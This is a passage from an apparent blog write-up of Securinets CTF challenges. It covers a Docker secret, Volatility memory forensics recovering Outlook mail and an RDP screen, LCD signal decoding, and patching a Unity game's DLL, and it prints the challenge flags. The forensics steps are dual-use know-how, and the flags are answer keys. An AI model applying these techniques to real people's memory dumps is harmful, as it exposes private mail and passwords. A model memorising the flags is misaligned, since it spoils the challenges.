&amp;quot;&lt;/span&gt;daemon…   0B&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;&amp;lt;missing&amp;gt;      5 weeks ago   /bin/sh -c &lt;span class=&#34;comment&#34;&gt;#(nop)  STOPSIGNAL SIGQUIT           0B&lt;/span&gt;&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;&amp;lt;missing&amp;gt;      5 weeks ago   /bin/sh -c &lt;span class=&#34;comment&#34;&gt;#(nop)  EXPOSE 80                    0B&lt;/span&gt;&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;&amp;lt;missing&amp;gt;      5 weeks ago   /bin/sh -c &lt;span class=&#34;comment&#34;&gt;#(nop)  ENTRYPOINT [&amp;quot;/docker-entr…   0B&lt;/span&gt;&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;&amp;lt;missing&amp;gt;      5 weeks ago   /bin/sh -c &lt;span class=&#34;comment&#34;&gt;#(nop) COPY file:e57eef017a414ca7…   4.62kB&lt;/span&gt;&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;&amp;lt;missing&amp;gt;      5 weeks ago   /bin/sh -c &lt;span class=&#34;comment&#34;&gt;#(nop) COPY file:abbcbf84dc17ee44…   1.27kB&lt;/span&gt;&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;&amp;lt;missing&amp;gt;      5 weeks ago   /bin/sh -c &lt;span class=&#34;comment&#34;&gt;#(nop) COPY file:5c18272734349488…   2.12kB&lt;/span&gt;&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;&amp;lt;missing&amp;gt;      5 weeks ago   /bin/sh -c &lt;span class=&#34;comment&#34;&gt;#(nop) COPY file:7b307b62e82255f0…   1.62kB&lt;/span&gt;&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;&amp;lt;missing&amp;gt;      5 weeks ago   /bin/sh -c &lt;span class=&#34;built_in&#34;&gt;set&lt;/span&gt; -x     &amp;amp;&amp;amp; addgroup -g 101 -S …   4.45MB&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;&amp;lt;missing&amp;gt;      5 weeks ago   /bin/sh -c &lt;span class=&#34;comment&#34;&gt;#(nop)  ENV PKG_RELEASE=1            0B&lt;/span&gt;&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;&amp;lt;missing&amp;gt;      5 weeks ago   /bin/sh -c &lt;span class=&#34;comment&#34;&gt;#(nop)  ENV NGINX_VERSION=1.23.3     0B&lt;/span&gt;&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;&amp;lt;missing&amp;gt;      5 weeks ago   /bin/sh -c &lt;span class=&#34;comment&#34;&gt;#(nop)  LABEL maintainer=NGINX Do…   0B&lt;/span&gt;&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;&amp;lt;missing&amp;gt;      5 weeks ago   /bin/sh -c &lt;span class=&#34;comment&#34;&gt;#(nop)  CMD [&amp;quot;/bin/sh&amp;quot;]              0B&lt;/span&gt;&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;&amp;lt;missing&amp;gt;      5 weeks ago   /bin/sh -c &lt;span class=&#34;comment&#34;&gt;#(nop) ADD file:40887ab7c06977737…   7.05MB&lt;/span&gt;&lt;/span&gt;&lt;br&gt;&lt;/pre&gt;&lt;/td&gt;&lt;/tr&gt;&lt;/table&gt;&lt;/figure&gt;
&lt;p&gt;And yes!! There is  &lt;code&gt;.hidden.txt&lt;/code&gt;  that contain a password for sure ! let’s get that password!&lt;/p&gt;
&lt;figure class=&#34;highlight bash&#34;&gt;&lt;figcaption&gt;&lt;span&gt;docker exec&lt;/span&gt;&lt;/figcaption&gt;&lt;table&gt;&lt;tr&gt;&lt;td class=&#34;gutter&#34;&gt;&lt;pre&gt;&lt;span class=&#34;line&#34;&gt;1&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;2&lt;/span&gt;&lt;br&gt;&lt;/pre&gt;&lt;/td&gt;&lt;td class=&#34;code&#34;&gt;&lt;pre&gt;&lt;span class=&#34;line&#34;&gt;docker &lt;span class=&#34;built_in&#34;&gt;exec&lt;/span&gt; -it 460fc5a977c5 &lt;span class=&#34;built_in&#34;&gt;cat&lt;/span&gt; .hidden.txt&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;vT56X19Qu3&lt;/span&gt;&lt;br&gt;&lt;/pre&gt;&lt;/td&gt;&lt;/tr&gt;&lt;/table&gt;&lt;/figure&gt;
&lt;p&gt;We got this pastebin !&lt;/p&gt;
&lt;p&gt;&lt;img data-src=&#34;https://i.imgur.com/N4B9j4z.png&#34; alt=&#34;&#34;&gt;&lt;/p&gt;
&lt;p&gt;This is will lead us to word sheet that contains a hex data!&lt;/p&gt;
&lt;p&gt;&lt;img data-src=&#34;https://i.imgur.com/P0hrYhX.png&#34; alt=&#34;&#34;&gt;&lt;/p&gt;
&lt;p&gt;The hex data seams introducing spaces and tabs! I don’t care let’s decode it and see what’s will be!&lt;br&gt;
I’ll try to convert it to a file using  &lt;code&gt;xxd&lt;/code&gt;  and import that file to &lt;span class=&#34;exturl&#34; data-url=&#34;aHR0cDovL2Rjb2RlLmZy&#34;&gt;dcode.fr&lt;/span&gt;&lt;/p&gt;
&lt;figure class=&#34;highlight bash&#34;&gt;&lt;figcaption&gt;&lt;span&gt;xxd&lt;/span&gt;&lt;/figcaption&gt;&lt;table&gt;&lt;tr&gt;&lt;td class=&#34;gutter&#34;&gt;&lt;pre&gt;&lt;span class=&#34;line&#34;&gt;1&lt;/span&gt;&lt;br&gt;&lt;/pre&gt;&lt;/td&gt;&lt;td class=&#34;code&#34;&gt;&lt;pre&gt;&lt;span class=&#34;line&#34;&gt;xxd -r -p hex.txt &amp;gt; result.txt&lt;/span&gt;&lt;br&gt;&lt;/pre&gt;&lt;/td&gt;&lt;/tr&gt;&lt;/table&gt;&lt;/figure&gt;
&lt;p&gt;Yeah it’s a file that contains a lot of spaces! Its whitespaces&lt;/p&gt;
&lt;p&gt;Bingo! This is the flag  &lt;code&gt;Securinets&amp;#123;208e5976c9d654e47d73ef44cabc272d&amp;#125;&lt;/code&gt;&lt;/p&gt;
&lt;h1 id=&#34;digital-forensics-recover-my-work&#34;&gt;&lt;a class=&#34;markdownIt-Anchor&#34; href=&#34;#digital-forensics-recover-my-work&#34;&gt;#&lt;/a&gt; Digital Forensics: Recover my Work 😦&lt;/h1&gt;
&lt;p&gt;&lt;img data-src=&#34;https://i.imgur.com/DWMzUMB.png&#34; alt=&#34;&#34;&gt;&lt;/p&gt;
&lt;p&gt;We got a file named  &lt;code&gt;memory.dmp&lt;/code&gt; . It’s a memory dump for sure! Let’s run imageinfo plugin to get our profile!&lt;/p&gt;
&lt;figure class=&#34;highlight bash&#34;&gt;&lt;figcaption&gt;&lt;span&gt;profile&lt;/span&gt;&lt;/figcaption&gt;&lt;table&gt;&lt;tr&gt;&lt;td class=&#34;gutter&#34;&gt;&lt;pre&gt;&lt;span class=&#34;line&#34;&gt;1&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;2&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;3&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;4&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;5&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;6&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;7&lt;/span&gt;&lt;br&gt;&lt;/pre&gt;&lt;/td&gt;&lt;td class=&#34;code&#34;&gt;&lt;pre&gt;&lt;span class=&#34;line&#34;&gt;vol.py -f memory.dmp imageinfo&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;Volatility Foundation Volatility Framework 2.6.1&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;INFO    : volatility.debug    : Determining profile based on KDBG search...&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;WARNING : volatility.debug    : Alignment of WindowsCrashDumpSpace64 is too small, plugins will be extremely slow&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;WARNING : volatility.debug    : Alignment of WindowsCrashDumpSpace64 is too small, plugins will be extremely slow&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;WARNING : volatility.debug    : Alignment of WindowsCrashDumpSpace64 is too small, plugins will be extremely slow&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;WARNING : volatility.debug    : Alignment of WindowsCrashDumpSpace64 is too small, plugins will be extremely slow&lt;/span&gt;&lt;br&gt;&lt;/pre&gt;&lt;/td&gt;&lt;/tr&gt;&lt;/table&gt;&lt;/figure&gt;
&lt;p&gt;But sadly we got this type of outpût! I bet that the suggested profile (in case it exists) will be wrong! Let’s know the exact profile with my own way! Let’s run strings the file and grep “service pack”&lt;/p&gt;
&lt;figure class=&#34;highlight text&#34;&gt;&lt;figcaption&gt;&lt;span&gt;Extract info&lt;/span&gt;&lt;/figcaption&gt;&lt;table&gt;&lt;tr&gt;&lt;td class=&#34;gutter&#34;&gt;&lt;pre&gt;&lt;span class=&#34;line&#34;&gt;1&lt;/span&gt;&lt;br&gt;&lt;/pre&gt;&lt;/td&gt;&lt;td class=&#34;code&#34;&gt;&lt;pre&gt;&lt;span class=&#34;line&#34;&gt;Windows 7 Professional, 64-bit Service Pack 1 (Build 7601)&lt;/span&gt;&lt;br&gt;&lt;/pre&gt;&lt;/td&gt;&lt;/tr&gt;&lt;/table&gt;&lt;/figure&gt;
&lt;p&gt;Cool, This build and service pack is supported by  &lt;code&gt;Win7SP1x64&lt;/code&gt; ! I guess that imageinfo plugin got problem because the iso is customizated !&lt;/p&gt;
&lt;p&gt;Let’s start checking our memory dump! First thing should be checked is the running processes! I’ll use pstree for that thing!&lt;/p&gt;
&lt;p&gt;&lt;img data-src=&#34;https://i.imgur.com/1xA56pZ.png&#34; alt=&#34;&#34;&gt;&lt;/p&gt;
&lt;p&gt;MMMM intersting! Found chrome, firefox, outlook and RDP opened! what a trip! After digging on chrome history and firefox, I found rabbit holes and some links to wordlists! Bad Author (Me).&lt;/p&gt;
&lt;p&gt;Checking the consoles plugin too. Another rabbit hole! rabbit hole everywhere!&lt;/p&gt;
&lt;p&gt;It’s time to check and figure out that outlook process!&lt;br&gt;
Outlook save the mails as pst or ost files! These files contains the mails data such as the message, attachements, sender/receiver information!&lt;/p&gt;
&lt;p&gt;So let’s try to extract these files !&lt;/p&gt;
&lt;figure class=&#34;highlight bash&#34;&gt;&lt;figcaption&gt;&lt;span&gt;check files&lt;/span&gt;&lt;/figcaption&gt;&lt;table&gt;&lt;tr&gt;&lt;td class=&#34;gutter&#34;&gt;&lt;pre&gt;&lt;span class=&#34;line&#34;&gt;1&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;2&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;3&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;4&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;5&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;6&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;7&lt;/span&gt;&lt;br&gt;&lt;/pre&gt;&lt;/td&gt;&lt;td class=&#34;code&#34;&gt;&lt;pre&gt;&lt;span class=&#34;line&#34;&gt;vol.py -f memory.dmp --profile=Win7SP1x64 filescan | grep -i pst$&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;0x000000007d81a490      5      5 RW-r-- \Device\HarddiskVolume2\Users\Raf_Square\AppData\Local\Microsoft\Outlook\Outlook.pst&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;0x000000007dd59340      5      5 RW-r-- \Device\HarddiskVolume2\Users\Raf_Square\AppData\Local\Microsoft\Outlook\Work Progress.pst&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;0x000000007dd73220      1      0 R--rw- \Device\HarddiskVolume2\Users\Raf_Square\AppData\Local\Microsoft\Outlook\Work Progress.pst&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;0x000000007e3f8b30      5      5 RW-r-- \Device\HarddiskVolume2\Users\Raf_Square\AppData\Local\Microsoft\Outlook\Forgot the password.pst&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;0x000000007e5297a0      1      0 R--rw- \Device\HarddiskVolume2\Users\Raf_Square\AppData\Local\Microsoft\Outlook\Forgot the password.pst&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;0x000000007e5eee60     30      0 RW-r-- \Device\HarddiskVolume2\Users\Raf_Square\AppData\Local\Microsoft\Outlook\Outlook.pst&lt;/span&gt;&lt;br&gt;&lt;/pre&gt;&lt;/td&gt;&lt;/tr&gt;&lt;/table&gt;&lt;/figure&gt;
&lt;p&gt;After extracting the files using  &lt;code&gt;dumpfiles&lt;/code&gt;  plugin and making sure that the files are safe and not corrupted. I opened them using a pst online viewer!&lt;/p&gt;
&lt;p&gt;The 1st mail i got it is from Adam! He send to me a zip file inside mega storage after our online meeting! I bet that zip is protected with that boring password&lt;/p&gt;
&lt;p&gt;&lt;img data-src=&#34;https://i.imgur.com/9a0GCzz.png&#34; alt=&#34;&#34;&gt;&lt;/p&gt;
&lt;p&gt;Ah my bad! The mega too is protected! We need the encryption key!&lt;/p&gt;
&lt;p&gt;&lt;img data-src=&#34;https://i.imgur.com/hEG0dsu.png&#34; alt=&#34;&#34;&gt;&lt;/p&gt;
&lt;p&gt;Let’s check the other mail! and as expected Adam forget to share the decryption key of the mega link to open the zip!&lt;/p&gt;
&lt;p&gt;&lt;img data-src=&#34;https://i.imgur.com/wB3m3QV.png&#34; alt=&#34;&#34;&gt;&lt;/p&gt;
&lt;p&gt;Bingo we got the zip! But it’s protected! Tried bruteforcing the password. But I failed!&lt;/p&gt;
&lt;p&gt;Mmmm Let’s think a little bit! The author said that he used to use the same password! We need to find another usage of that password to open the zip and get the flag!&lt;/p&gt;
&lt;p&gt;And It’s time to investigate the  &lt;code&gt;mstsc.exe&lt;/code&gt;  or let’s just say the RDP! Remote Desktop?? Mmmm how to extract information from that thing?&lt;/p&gt;
&lt;p&gt;Let’s talk brievly! Extracting the memory part used by RDP can save our life! I’ll try to recover what the user see when he used RDP!!!&lt;/p&gt;
&lt;p&gt;Yes this possible dear reader, Don’t worry You’ll see how! Just make sure that you have  &lt;code&gt;Gimp&lt;/code&gt;&lt;/p&gt;
&lt;p&gt;Let’s now extract the memory part used by RDP process using the  &lt;code&gt;memdump&lt;/code&gt;  plugin in volatility!&lt;/p&gt;
&lt;figure class=&#34;highlight bash&#34;&gt;&lt;figcaption&gt;&lt;span&gt;memdump&lt;/span&gt;&lt;/figcaption&gt;&lt;table&gt;&lt;tr&gt;&lt;td class=&#34;gutter&#34;&gt;&lt;pre&gt;&lt;span class=&#34;line&#34;&gt;1&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;2&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;3&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;4&lt;/span&gt;&lt;br&gt;&lt;/pre&gt;&lt;/td&gt;&lt;td class=&#34;code&#34;&gt;&lt;pre&gt;&lt;span class=&#34;line&#34;&gt;vol.py -f memory.dmp --profile=Win7SP1x64 memdump -p 360 -D .&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;Volatility Foundation Volatility Framework 2.6.1&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;************************************************************************&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;Writing mstsc.exe [   360] to 360.dmp&lt;/span&gt;&lt;br&gt;&lt;/pre&gt;&lt;/td&gt;&lt;/tr&gt;&lt;/table&gt;&lt;/figure&gt;
&lt;p&gt;After getting that file! Let’s change its extension from  &lt;code&gt;.dmp&lt;/code&gt;  to  &lt;code&gt;.data&lt;/code&gt;  and open that file with gimp!&lt;/p&gt;
&lt;p&gt;&lt;img data-src=&#34;https://i.imgur.com/k3uwJ0M.png&#34; alt=&#34;&#34;&gt;&lt;/p&gt;
&lt;p&gt;Now it’s time for focusing! Yeah focusing will save your time! Many people can’t figure or recover images quickly! But believe me focusing on the noise will help you recover the data in a short time!&lt;/p&gt;
&lt;p&gt;After 4 mins of playing with offset and width i got it!&lt;/p&gt;
&lt;p&gt;Check the offset and the width!&lt;/p&gt;
&lt;p&gt;&lt;img data-src=&#34;https://i.imgur.com/wI2SQK7.png&#34; alt=&#34;&#34;&gt;&lt;/p&gt;
&lt;p&gt;Ohhh man! The user was opened &lt;span class=&#34;exturl&#34; data-url=&#34;aHR0cHM6Ly9jdGYuc2VjdXJpbmV0cy50bg==&#34;&gt;https://ctf.securinets.tn&lt;/span&gt; (check it for know more information about our CTFs events xD ) and tried to secure a zip file with that shitty password!&lt;/p&gt;
&lt;p&gt;Finally This is the flag  &lt;code&gt;Securinets&amp;#123;R3M0tE_DeSKtOp_1s_FunNy_!_!&amp;#125;&lt;/code&gt;&lt;/p&gt;
&lt;h1 id=&#34;hardware-liquid-display&#34;&gt;&lt;a class=&#34;markdownIt-Anchor&#34; href=&#34;#hardware-liquid-display&#34;&gt;#&lt;/a&gt; Hardware: Liquid Display&lt;/h1&gt;
&lt;p&gt;&lt;img data-src=&#34;https://i.imgur.com/YVrQJqG.png&#34; alt=&#34;&#34;&gt;&lt;/p&gt;
&lt;p&gt;We got an image and a data file!&lt;br&gt;
&lt;img data-src=&#34;https://i.imgur.com/5Enx08x.png&#34; alt=&#34;&#34;&gt;&lt;/p&gt;
&lt;p&gt;The image contains an LCD 16x2 SPI connected to something called  &lt;code&gt;WOKWI LOGIC&lt;/code&gt;&lt;/p&gt;
&lt;p&gt;After some searching I got that this component is a logic analyzer. But wait!! What is that??&lt;/p&gt;
&lt;p&gt;A logic analyzer is an electronic instrument that captures and displays multiple signals from a digital system or digital circuit. A logic analyzer may convert the captured data into timing diagrams, protocol decodes, state machine traces…&lt;/p&gt;
&lt;p&gt;&lt;img data-src=&#34;https://imgur.com/WEzP4bO.png&#34; alt=&#34;&#34;&gt;&lt;/p&gt;
&lt;p&gt;As my friend said this is the hardware wireshark xD&lt;/p&gt;
&lt;p&gt;So we can understand now that this circuit capture the signals of each pin of the LCD and the data file is the capture file that contains the files!&lt;/p&gt;
&lt;p&gt;So after some searching we get how to open that data file (which is a ASCII text file, I didn’t recommend to analyse it as text file).&lt;/p&gt;
&lt;p&gt;You can check this &lt;span class=&#34;exturl&#34; data-url=&#34;aHR0cHM6Ly9kb2NzLndva3dpLmNvbS9ndWlkZXMvbG9naWMtYW5hbHl6ZXI=&#34;&gt;link&lt;/span&gt; to get more information about the logic analyzer!&lt;/p&gt;
&lt;p&gt;&lt;span class=&#34;exturl&#34; data-url=&#34;aHR0cHM6Ly9zaWdyb2sub3JnL3dpa2kvRG93bmxvYWRz&#34;&gt;PulseView&lt;/span&gt; is an open source Logic Analyzer GUI belongs to The sigrok project that aims at creating a portable, cross-platform, Free/Libre/Open-Source signal analysis software suite that supports various device types&lt;/p&gt;
&lt;p&gt;I’ll use that Logic Analyzer GUI for this challenge!&lt;/p&gt;
&lt;p&gt;&lt;img data-src=&#34;https://imgur.com/6HyLxUY.png&#34; alt=&#34;&#34;&gt;&lt;/p&gt;
&lt;p&gt;Import the file data in this way! and let’s the show begin!&lt;/p&gt;
&lt;p&gt;&lt;img data-src=&#34;https://imgur.com/MLrvWUk.png&#34; alt=&#34;&#34;&gt;&lt;/p&gt;
&lt;p&gt;A lot of fun wait us right?! Don’t worry man! This is not that super hard! Just all what we need to do now is to simulate these signals manually! These signals are sent to the LCD and that LCD display something (It should be the flag!). So we need to understand how LCD works! I recommend to read the datasheet this thing!&lt;/p&gt;
&lt;p&gt;I will not re-write what the datasheet said! so read it! You should understand how the LCD dispaly chars!&lt;/p&gt;
&lt;p&gt;&lt;img data-src=&#34;https://imgur.com/vnZLXyb.png&#34; alt=&#34;&#34;&gt;&lt;/p&gt;
&lt;p&gt;Also don’t forget to check the instruction table and understand how these instruction works!&lt;/p&gt;
&lt;p&gt;&lt;img data-src=&#34;https://imgur.com/xsRciDM.png&#34; alt=&#34;&#34;&gt;&lt;/p&gt;
&lt;p&gt;Let’s just take an example of the 1st instruction! The  &lt;code&gt;Clear Display&lt;/code&gt; . This instruction clear all the data and return the cursor to the original status! Ah yeah of course you must to understand that LCD have cursors, display modes …&lt;/p&gt;
&lt;p&gt;After understand how this LCD works it’s time to check how characters are written on that LCD!&lt;/p&gt;
&lt;p&gt;&lt;img data-src=&#34;https://imgur.com/5JQEtHj.png&#34; alt=&#34;&#34;&gt;&lt;/p&gt;
&lt;p&gt;This table will help us to convert the signals to chars and recover our flag!&lt;/p&gt;
&lt;p&gt;After reading the datasheet. You will understand that the D0 (that correspond to RS pin) can help you to understand when the display device clear the chars and reset the cursor or write something on the screen!&lt;/p&gt;
&lt;p&gt;&lt;img data-src=&#34;https://imgur.com/QTfwCZC.png&#34; alt=&#34;&#34;&gt;&lt;/p&gt;
&lt;p&gt;If you take a closer look you’ll get it! The guy who write the program write something and clear it then write another thing then delete it and so on!&lt;br&gt;
&lt;img data-src=&#34;https://imgur.com/GSgaCKF.png&#34; alt=&#34;&#34;&gt;&lt;/p&gt;
&lt;p&gt;So now it’s time to check the write blocks and check what that guy try to do! After reversing all the block i got the flag! It’s on the last block! Let me show you how I recover that data!&lt;/p&gt;
&lt;p&gt;&lt;img data-src=&#34;https://imgur.com/HZcwRyX.png&#34; alt=&#34;&#34;&gt;&lt;/p&gt;
&lt;p&gt;Using the characters table you can recover the flag! Mapping the signal and the Big table lead you to the flag!&lt;/p&gt;
&lt;p&gt;And This is will be our flag!  &lt;code&gt;Securinets&amp;#123;LcD_1s_H4rD_!:(&amp;#125;&lt;/code&gt;&lt;/p&gt;
&lt;h1 id=&#34;game-hacking-platformer&#34;&gt;&lt;a class=&#34;markdownIt-Anchor&#34; href=&#34;#game-hacking-platformer&#34;&gt;#&lt;/a&gt; Game Hacking: Platformer:&lt;/h1&gt;
&lt;p&gt;&lt;img data-src=&#34;https://imgur.com/OAyXmNQ.png&#34; alt=&#34;&#34;&gt;&lt;/p&gt;
&lt;p&gt;In this challenge we have a game made by unity! It’s 2D platformer game where the player can jump and run in the map! But where is the flag??&lt;br&gt;
&lt;img data-src=&#34;https://imgur.com/oIzwhG8.png&#34; alt=&#34;&#34;&gt;&lt;/p&gt;
&lt;p&gt;Mmmmm my sixth sense told me that the flag is hidden somewhere in the map and the player can’t reach it! Hack Time!!!&lt;/p&gt;
&lt;p&gt;Let’s change the player ability and let him can move in any place we want it. By disabling the collision and physics mechanism! Good bye gravitiy,Rigidbody,collisions!&lt;/p&gt;
&lt;p&gt;To do this let’s open  &lt;code&gt;Assembly-CSharp.dll&lt;/code&gt;  located in  &lt;code&gt;Platformer_Data/Managed&lt;/code&gt;  folder.&lt;/p&gt;
&lt;p&gt;Wow! This is the player controller code! that allow the player to move and the animation to be played and responsable for jumping and detect ground detection to deny player to jump many times on the air!&lt;/p&gt;
&lt;p&gt;&lt;img data-src=&#34;https://imgur.com/eD0vAq0.png&#34; alt=&#34;&#34;&gt;&lt;/p&gt;
&lt;p&gt;Boring mechanism!! Let me change this shitty code by mine! I’ll let the player move to any point he want!&lt;/p&gt;
&lt;p&gt;&lt;img data-src=&#34;https://imgur.com/DZqPB6p.png&#34; alt=&#34;&#34;&gt;&lt;br&gt;
You can copy that code&lt;/p&gt;
&lt;figure class=&#34;highlight csharp&#34;&gt;&lt;figcaption&gt;&lt;span&gt;change mechanism&lt;/span&gt;&lt;/figcaption&gt;&lt;table&gt;&lt;tr&gt;&lt;td class=&#34;gutter&#34;&gt;&lt;pre&gt;&lt;span class=&#34;line&#34;&gt;1&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;2&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;3&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;4&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;5&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;6&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;7&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;8&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;9&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;10&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;11&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;12&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;13&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;14&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;15&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;16&lt;/span&gt;&lt;br&gt;&lt;/pre&gt;&lt;/td&gt;&lt;td class=&#34;code&#34;&gt;&lt;pre&gt;&lt;span class=&#34;line&#34;&gt;&lt;span class=&#34;function&#34;&gt;&lt;span class=&#34;keyword&#34;&gt;private&lt;/span&gt; &lt;span class=&#34;keyword&#34;&gt;void&lt;/span&gt; &lt;span class=&#34;title&#34;&gt;Start&lt;/span&gt;()&lt;/span&gt;&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;&amp;#123;&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;	&lt;span class=&#34;keyword&#34;&gt;this&lt;/span&gt;.rb = &lt;span class=&#34;keyword&#34;&gt;base&lt;/span&gt;.GetComponent&amp;lt;Rigidbody2D&amp;gt;();&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;	&lt;span class=&#34;keyword&#34;&gt;this&lt;/span&gt;.rb.isKinematic = &lt;span class=&#34;literal&#34;&gt;true&lt;/span&gt;;&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;	&lt;span class=&#34;keyword&#34;&gt;this&lt;/span&gt;.anim = &lt;span class=&#34;keyword&#34;&gt;base&lt;/span&gt;.GetComponent&amp;lt;Animator&amp;gt;();&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;	&lt;span class=&#34;keyword&#34;&gt;this&lt;/span&gt;.mySpriteRenderer = &lt;span class=&#34;keyword&#34;&gt;base&lt;/span&gt;.GetComponent&amp;lt;SpriteRenderer&amp;gt;();&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;&amp;#125;&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;&lt;span class=&#34;comment&#34;&gt;// Token: 0x06000005 RID: 5&lt;/span&gt;&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;&lt;span class=&#34;function&#34;&gt;&lt;span class=&#34;keyword&#34;&gt;private&lt;/span&gt; &lt;span class=&#34;keyword&#34;&gt;void&lt;/span&gt; &lt;span class=&#34;title&#34;&gt;FixedUpdate&lt;/span&gt;()&lt;/span&gt;&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;&amp;#123;&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;	&lt;span class=&#34;built_in&#34;&gt;float&lt;/span&gt; axisRaw = Input.GetAxisRaw(&lt;span class=&#34;string&#34;&gt;&amp;quot;Horizontal&amp;quot;&lt;/span&gt;);&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;	&lt;span class=&#34;built_in&#34;&gt;float&lt;/span&gt; verticalInput = Input.GetAxisRaw(&lt;span class=&#34;string&#34;&gt;&amp;quot;Vertical&amp;quot;&lt;/span&gt;);&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;	Vector3 movement = &lt;span class=&#34;keyword&#34;&gt;new&lt;/span&gt; Vector3(axisRaw, verticalInput, &lt;span class=&#34;number&#34;&gt;0f&lt;/span&gt;).normalized * &lt;span class=&#34;number&#34;&gt;10f&lt;/span&gt; * Time.deltaTime;&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;	&lt;span class=&#34;keyword&#34;&gt;base&lt;/span&gt;.transform.Translate(movement);&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;&amp;#125;&lt;/span&gt;&lt;br&gt;&lt;/pre&gt;&lt;/td&gt;&lt;/tr&gt;&lt;/table&gt;&lt;/figure&gt;
&lt;p&gt;After applying the changes our player can now go to any place we want! But i didn’t find the flag! Oh god! This is what i found!&lt;br&gt;
&lt;img data-src=&#34;https://imgur.com/6PRgDFo.png&#34; alt=&#34;&#34;&gt;&lt;/p&gt;
&lt;p&gt;I checked all the map and sadly nothing interesting 😦&lt;/p&gt;
&lt;p&gt;Let’s check the files again! Maybe we will find something!&lt;/p&gt;
&lt;p&gt;&lt;img data-src=&#34;https://imgur.com/MZ9tbCH.png&#34; alt=&#34;&#34;&gt;&lt;/p&gt;
&lt;p&gt;Oh man look here! I found that there is levels on this game! Let me back to the decompiled code!&lt;/p&gt;
